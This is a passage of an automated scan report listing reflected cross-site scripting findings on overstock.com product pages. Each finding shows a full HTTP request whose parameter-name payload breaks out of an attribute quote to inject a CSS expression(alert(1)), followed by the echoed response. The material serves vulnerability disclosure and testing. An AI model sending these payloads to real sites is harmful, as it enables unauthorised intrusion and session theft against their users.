Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4124072|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pr
...[SNIP]...
<input type="hidden" name="421c7"style="x:expression(alert(1))"493fc4af8a3" value="1"/>
...[SNIP]...

2.69. http://www.overstock.com/Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 179c0"style="x:expression(alert(1))"7a88e7a4193 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html?179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:40 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:40 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4469409|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:40 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408260429:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="179c0"style="x:expression(alert(1))"7a88e7a4193" value="1"/>
...[SNIP]...

2.70. http://www.overstock.com/Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 253bb"style="x:expression(alert(1))"2d7438fcdec in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html?253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:36 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408136880:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4745510|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:36 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:36 GMT; Path=/
Keep-Alive: timeout=5, max=24
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="253bb"style="x:expression(alert(1))"2d7438fcdec" value="1"/>
...[SNIP]...

2.71. http://www.overstock.com/Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41b46"style="x:expression(alert(1))"9675ca43ed6 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html?41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:27 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408127359:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4745019|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ro
...[SNIP]...
<input type="hidden" name="41b46"style="x:expression(alert(1))"9675ca43ed6" value="1"/>
...[SNIP]...

2.72. http://www.overstock.com/Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77013"style="x:expression(alert(1))"cc09ed7b953 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html?77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:52 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408092192:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:52 GMT; Path=/
Set-Cookie: mxcproclicks=4662671|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:52 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ru
...[SNIP]...
<input type="hidden" name="77013"style="x:expression(alert(1))"cc09ed7b953" value="1"/>
...[SNIP]...

2.73. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93964"style%3d"x%3aexpression(alert(1))"917236cdfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93964"style="x:expression(alert(1))"917236cdfca in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html?93964"style%3d"x%3aexpression(alert(1))"917236cdfca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:11 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408171879:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:11 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4224471|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:11 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118836

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="93964"style="x:expression(alert(1))"917236cdfca" value="1"/>
...[SNIP]...

2.74. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3702"style%3d"x%3aexpression(alert(1))"896647dec7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3702"style="x:expression(alert(1))"896647dec7d in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html?c3702"style%3d"x%3aexpression(alert(1))"896647dec7d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408157236:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4050883|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:57 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:57 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="c3702"style="x:expression(alert(1))"896647dec7d" value="1"/>
...[SNIP]...

2.75. http://www.overstock.com/Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5502"style="x:expression(alert(1))"44ef05ee2ed in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html?e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:52:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:52:58 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404378222:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:58 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5113676|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 123311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="e5502"style="x:expression(alert(1))"44ef05ee2ed" value="1"/>
...[SNIP]...

2.76. http://www.overstock.com/Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html

Issue detail

